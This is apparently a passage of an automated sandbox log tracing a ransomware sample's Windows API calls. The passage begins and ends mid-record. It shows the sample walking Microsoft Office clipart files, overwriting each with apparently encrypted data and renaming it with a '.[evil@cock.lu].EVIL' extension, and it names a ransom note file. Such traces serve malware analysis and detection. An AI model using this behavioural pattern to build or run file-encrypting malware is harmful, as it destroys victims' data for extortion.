51 [0121.947] __uncaught_exception () returned 0x84b1160800 [0121.947] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.947] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf.[evil@cock.lu].evil")) returned 1 [0121.948] ??_V@YAXPEAX@Z () returned 0x1 [0121.951] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF", dwFileAttributes=0x200) returned 0 [0121.951] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.951] wcsstr (_Str="FD00799_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.951] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 69 [0121.951] wcscmp (_String1="FD00799_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.951] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00799_.WMF") returned 0x0 [0121.951] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 0x45 [0121.951] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.953] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3690, lpOverlapped=0x0) returned 1 [0121.982] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.982] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.982] _errno () returned 0x84b1160840 [0121.982] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.982] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x36a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x36a0, lpOverlapped=0x0) returned 1 [0121.982] CloseHandle (hObject=0x1a8) returned 1 [0121.982] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.982] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.982] __uncaught_exception () returned 0x84b1160800 [0121.982] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.983] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf.[evil@cock.lu].evil")) returned 1 [0121.983] ??_V@YAXPEAX@Z () returned 0x1 [0121.987] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF", dwFileAttributes=0x200) returned 0 [0121.987] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.987] wcsstr (_Str="FD00814_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.987] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 69 [0121.987] wcscmp (_String1="FD00814_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.987] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00814_.WMF") returned 0x0 [0121.988] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 0x45 [0121.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.990] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa6d0, lpOverlapped=0x0) returned 1 [0122.010] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.010] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.010] _errno () returned 0x84b1160840 [0122.010] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.010] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xa6e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa6e0, lpOverlapped=0x0) returned 1 [0122.011] CloseHandle (hObject=0x1a8) returned 1 [0122.011] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.011] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.011] __uncaught_exception () returned 0x84b1160800 [0122.011] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.012] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf.[evil@cock.lu].evil")) returned 1 [0122.012] ??_V@YAXPEAX@Z () returned 0x1 [0122.016] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF", dwFileAttributes=0x200) returned 0 [0122.016] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.016] wcsstr (_Str="FD00965_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.016] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 69 [0122.016] wcscmp (_String1="FD00965_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.016] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00965_.WMF") returned 0x0 [0122.016] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 0x45 [0122.016] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.019] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3b3c, lpOverlapped=0x0) returned 1 [0122.070] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.070] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.070] _errno () returned 0x84b1160840 [0122.070] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.071] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3b40, lpOverlapped=0x0) returned 1 [0122.071] CloseHandle (hObject=0x1a8) returned 1 [0122.071] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.071] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.071] __uncaught_exception () returned 0x84b1160800 [0122.071] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.072] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf.[evil@cock.lu].evil")) returned 1 [0122.072] ??_V@YAXPEAX@Z () returned 0x1 [0122.076] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF", dwFileAttributes=0x200) returned 0 [0122.076] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.076] wcsstr (_Str="FD01074_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.076] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 69 [0122.076] wcscmp (_String1="FD01074_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.076] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01074_.WMF") returned 0x0 [0122.076] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 0x45 [0122.076] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.078] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x121a, lpOverlapped=0x0) returned 1 [0122.094] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.094] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.094] _errno () returned 0x84b1160840 [0122.094] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.094] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1220, lpOverlapped=0x0) returned 1 [0122.094] CloseHandle (hObject=0x1a8) returned 1 [0122.094] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.094] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.095] __uncaught_exception () returned 0x84b1160800 [0122.095] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.095] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01074_.wmf.[evil@cock.lu].evil")) returned 1 [0122.096] ??_V@YAXPEAX@Z () returned 0x1 [0122.099] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01074_.WMF", dwFileAttributes=0x200) returned 0 [0122.099] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.099] wcsstr (_Str="FD01084_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.099] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 69 [0122.099] wcscmp (_String1="FD01084_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.099] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01084_.WMF") returned 0x0 [0122.099] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 0x45 [0122.099] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.101] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x96c, lpOverlapped=0x0) returned 1 [0122.108] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.108] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.108] _errno () returned 0x84b1160840 [0122.108] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.108] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x980, lpOverlapped=0x0) returned 1 [0122.108] CloseHandle (hObject=0x1a8) returned 1 [0122.108] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.109] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.109] __uncaught_exception () returned 0x84b1160800 [0122.109] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.109] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01084_.wmf.[evil@cock.lu].evil")) returned 1 [0122.110] ??_V@YAXPEAX@Z () returned 0x1 [0122.113] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01084_.WMF", dwFileAttributes=0x200) returned 0 [0122.114] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.114] wcsstr (_Str="FD01176_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.114] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 69 [0122.114] wcscmp (_String1="FD01176_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.114] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01176_.WMF") returned 0x0 [0122.114] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 0x45 [0122.114] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.116] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1378, lpOverlapped=0x0) returned 1 [0122.124] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.124] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.124] _errno () returned 0x84b1160840 [0122.124] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.124] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1380, lpOverlapped=0x0) returned 1 [0122.124] CloseHandle (hObject=0x1a8) returned 1 [0122.124] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.125] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.125] __uncaught_exception () returned 0x84b1160800 [0122.125] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.125] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01176_.wmf.[evil@cock.lu].evil")) returned 1 [0122.126] ??_V@YAXPEAX@Z () returned 0x1 [0122.129] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01176_.WMF", dwFileAttributes=0x200) returned 0 [0122.129] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.129] wcsstr (_Str="FD01191_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.129] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 69 [0122.130] wcscmp (_String1="FD01191_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.130] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01191_.WMF") returned 0x0 [0122.130] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 0x45 [0122.130] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.132] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf7c, lpOverlapped=0x0) returned 1 [0122.153] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.153] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.153] _errno () returned 0x84b1160840 [0122.153] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.153] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf80, lpOverlapped=0x0) returned 1 [0122.153] CloseHandle (hObject=0x1a8) returned 1 [0122.153] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.154] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.154] __uncaught_exception () returned 0x84b1160800 [0122.154] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.154] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf.[evil@cock.lu].evil")) returned 1 [0122.155] ??_V@YAXPEAX@Z () returned 0x1 [0122.158] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF", dwFileAttributes=0x200) returned 0 [0122.158] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0122.158] wcsstr (_Str="FD01193_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0122.158] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 69 [0122.158] wcscmp (_String1="FD01193_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0122.158] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD01193_.WMF") returned 0x0 [0122.158] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF") returned 0x45 [0122.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0122.161] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x488, lpOverlapped=0x0) returned 1 [0122.166] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.166] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0122.166] _errno () returned 0x84b1160840 [0122.166] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.166] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4a0, lpOverlapped=0x0) returned 1 [0122.166] CloseHandle (hObject=0x1a8) returned 1 [0122.167] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0122.167] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0122.167] __uncaught_exception () returned 0x84b1160800 [0122.167] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0122.167] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft 